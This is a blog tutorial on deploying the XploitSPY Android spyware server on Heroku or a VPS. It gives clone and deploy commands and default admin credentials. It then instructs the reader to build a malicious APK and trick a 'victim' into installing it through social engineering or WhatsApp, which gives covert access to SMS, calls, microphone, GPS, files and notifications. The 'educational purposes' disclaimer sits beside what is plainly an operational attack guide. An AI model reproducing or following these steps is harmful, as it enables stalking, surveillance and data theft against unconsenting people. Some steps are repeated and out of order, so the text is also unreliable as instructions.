Hello guys, In this post I am going to show how to install and use xploitspy in Termux.
What is Xploitspy?
XploitSPY is an Android monitoring/spying tool. With the help of this tool, you can achieve a remote control on any android device to access Messages, Calls, Files, etc.
A cloud-based Android spy or monitoring tool, developed in NodeJS.
Read all the steps carefully to configure XploitSPY as it can change as needed.
Darkhackerworld makes no warranty with this software and will not be responsible for any direct or indirect damage caused by the use of this tool. Darkhackerworld is built for educational purposes. Use it at your own risk.
heroku git:remote -a appName
heroku buildpacks:add heroku/nodejs
Now run this command in your terminal git push heroku master, if you update the existing application or face any error, run this command git push -f heroku master.
Now Everything is ready and complete, now you can visit your domain displayed in the terminal.
git clone https://github.com/XploitWizer/XploitSPY.git
sudo pm2 start index.js
Next, the administration panel will be presented there. At the moment, there is no device “hacked”.
So, we must create the APK ( APK Builder) and install it on the victim's smartphone.
After building and downloading the app on your pc send this app to your victim with some social engineering techniques. Or you can send the app to your victim via file upload or on WhatsApp.
Once the victim has installed the APK, we will have remote access to the device.
Now you can browse approx each and everything that is present in the victim device. If you like our article show your love by sharing the article on social media.
If you face any problem then feel free to ask in the comment section.
1. Features of XploitSpy
- GPS log
- Microphone recording
- See contacts
- SMS logs
- Send SMS
- Call logs
- View installed apps
- View stub permissions
- Live clipboard log
- Registration of live notifications (WhatsApp, Facebook, Instagram, Gmail, and more.)
- See WiFi networks (records seen previously)
- File Explorer and Downloader
- Built-in APK Builder
Prerequisites
- Java Runtime Environment 9+
- NodeJs
- A server (optional)
2. Installation on Heroku
Once your account is confirmed by email; click on Create a New App in the Heroku panel. Enter the name of the application and click Create App.
Now install Heroku CLI on your PC, with the instructions here. Alternatively, if you have Node and NPM installed, you can run the following command to install Heroku:
npm install -g heroku
- Now open your terminal and run the command git clone. This will download the latest version of XploitSPY to your PC
git clone https://github.com/XploitWizer/XploitSPY
- After successfully cloning change the directory to XploitSPY using the command cd XploitSPY
Cd XploitSPY
- Now login to Heroku CLI using the following command.
heroku login -i
After giving heroku login -i command enter the credential that you provided on the Heroku website at the time of signup. After entering your credential press enter.
After successful login, you will see the following things mentioned in the below image.
Now we can access the remote app that we have created. Run the following command in a terminal, where it appName will be the name of your application that you chose when creating the application.
Now run the below command to install packages:
heroku buildpacks:add heroku/jvm
then,run:
Now run this command in your terminal git push heroku master, if you update the existing application or face any error, run this command git push -f heroku master.
git push heroku master
If you follow my every step correctly then you will see the following screen:
Default username: admin and default password : password
3. Installation in VPS or Server
- Connect to your server via SSH
- Install JRE 9+
In Debian, Ubuntu, etc you can use the following command:
sudo apt install openjdk-11-jre-headless
Fedora, Oracle, Red Hat, etc.
sudo yum install java-11-openjdk-devel
Install the NodeJS instructions (if you can't solve this you really shouldn't be using this)
Install pm2
sudo npm install pm2 -g
Clone this repository:
Now you need to change to the server directory and run these commands
#install dependencies
npm install
# Start the script
# start XploitSPY
sudo pm2 startup
Default username: admin and default password: password
XploitSPY now only works on port 80 for web and client. It is recommended to run XploitSPY behind a reverse proxy like NGINX
4. Spy/Hack Android
First, we will log in to the URL that we had generated in section 2. The default login credentials are admin and password.
Next, the administration panel will be presented there. At the moment, there is no device “hacked”.
So, we must create the APK ( APK Builder) and install it on the victim's smartphone.
After building and downloading the app on your pc send this app to your victim with some social engineering techniques. Or you can send the app to your victim via file upload or on WhatsApp.
Once the victim has installed the APK, we will have remote access to the device.
From the button Manage, we can manage different settings of the phone. such as Messages, Calls, Applications, Microphone, Contacts, File manager, GPS, etc.
Note: This is for educational purpose only don't use this method of hacking on anyone until you have written permission to do this. The purpose of this article is to make you safe from these kinds of attacks. If you hack anyone without the knowledge of the victim then you can be in trouble.
If you face any problem then feel free to ask in the comment section.